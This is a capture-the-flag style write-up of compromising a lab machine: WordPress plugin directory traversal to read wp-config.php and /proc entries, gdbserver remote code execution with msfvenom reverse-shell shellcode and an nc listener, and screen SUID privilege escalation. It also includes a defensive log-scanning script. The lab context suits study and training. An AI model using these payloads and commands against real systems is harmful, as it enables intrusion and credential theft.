0x01 Introduction
Target machine IP: 10.10.11.125.
Local machine IP: 10.10.16.21, Mac M1.
0x02 Simple Information Gathering
Port scanning with fscan found only ports 22 and 80. An nmap scan discovered an additional port, 1337, but at this point it is unclear what service it runs.
nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.125
Accessing http://10.10.11.125/ reveals a WordPress website with version 5.8.1. The login address for the WordPress backend is http://backdoor.htb/wp-login.php.
The wpscan results did not provide any useful information.
Under WordPress's wp-content directory there is a plugins directory. Accessing http://10.10.11.125/wp-content/plugins/ reveals a hello.php file and an ebook-download directory. Initially hello.php was suspected to be a malicious file, but analysis showed it is not malware. Since ebook-download sits in the plugins directory and contains a readme.txt, it is confirmed to be a plugin.
0x03 Exploiting Vulnerabilities
Searching for exploits on the website https://www.exploit-db.com/, a directory traversal vulnerability is found.
The proof of concept (PoC) is as follows:
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================
Download the wp-config file.
http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
This file contains the username and password for the database. Attempting to log in to the WordPress backend with these credentials fails.
At this point there are no further ideas. On closer inspection it turns out that the service on port 1337 is gdbserver, which can be exploited directly for remote code execution (RCE). Pentesting gdbserver is covered at: https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver, and the exploit script for gdbserver can be found at: https://www.exploit-db.com/exploits/50539.
Exploitation process:
- Download the exploit to the local machine.
- Generate shellcode using msfvenom.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.21 LPORT=1234 PrependFork=true -o rev.bin
- Start a local listener.
nc -lvp 1234
- Run the exploit.
python3 gdbserver_exp.py 10.10.11.125:1337 rev.bin
Upgrade to an interactive terminal:
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
export TERM=xterm-256color
Another way to determine the services running on the target server is through the same arbitrary file read: /proc/<pid>/cmdline holds the command line of each running process, under a proc directory named after its process ID (PID).
Iterating over PIDs with Burp Suite enumerates the services running on the target server.
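As an added, defender-side example that is not part of the original writeup: a Python scan over web-server access log lines that flags requests to the ebook-download filedownload.php endpoint whose ebookdownloadurl parameter carries a traversal path, an absolute path, or a /proc/<pid>/cmdline read, the two read patterns described above. The log lines, the 192.0.2.x addresses and the legitimate book URL are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (common log format); not taken from the target.
SAMPLE_LOG = """\
10.10.16.21 - - [20/Nov/2021:10:01:02 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3018
10.10.16.21 - - [20/Nov/2021:10:01:09 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/1/cmdline HTTP/1.1" 200 41
10.10.16.21 - - [20/Nov/2021:10:01:10 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=%252e%252e%252fwp-config.php HTTP/1.1" 200 3018
192.0.2.7 - - [20/Nov/2021:10:02:00 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=http://backdoor.htb/wp-content/uploads/book.pdf HTTP/1.1" 200 9001
192.0.2.8 - - [20/Nov/2021:10:02:30 +0000] "GET /wp-login.php HTTP/1.1" 200 2100
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
VULN_PATH = "/wp-content/plugins/ebook-download/filedownload.php"

def classify(value):
    """Return a reason if the parameter looks like a local file read, else None."""
    decoded = unquote(unquote(value))  # parse_qs decoded once; undo double encoding too
    segments = decoded.replace("\\", "/").split("/")
    if ".." in segments:
        return "traversal"
    if decoded.startswith("/proc/"):
        return "proc-enumeration"
    if decoded.startswith("/"):
        return "absolute-path"
    return None  # e.g. a normal http(s) URL to a book file

def scan_log(text):
    """Yield (ip, reason, decoded_value, status) for each suspicious filedownload.php request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != VULN_PATH:
            continue
        for value in parse_qs(parts.query).get("ebookdownloadurl", []):
            reason = classify(value)
            if reason:
                hits.append((m["ip"], reason, unquote(unquote(value)), int(m["status"])))
    return hits

def summarize(hits):
    """Count flagged requests per source IP and reason; many proc-enumeration hits from one host is the PID sweep."""
    counts = {}
    for ip, reason, _, _ in hits:
        counts.setdefault(ip, {})
        counts[ip][reason] = counts[ip].get(reason, 0) + 1
    return counts

if __name__ == "__main__":
    for ip, reason, value, status in scan_log(SAMPLE_LOG):
        print(f"{ip} {reason:17} {status} {value}")
    print(summarize(scan_log(SAMPLE_LOG)))
```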
0x04 Privilege Escalation
Search for files with the SUID bit set and owned by the root user. One such file is /usr/bin/screen.
find / -perm -4000 -type f 2>/dev/null
screen -x root/root
0x05 Conclusion
- Learned how to use arbitrary file read vulnerabilities to determine the services running on the target server, as well as knowledge about screen privilege escalation.
References:
https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver
https://zhuanlan.zhihu.com/p/437147174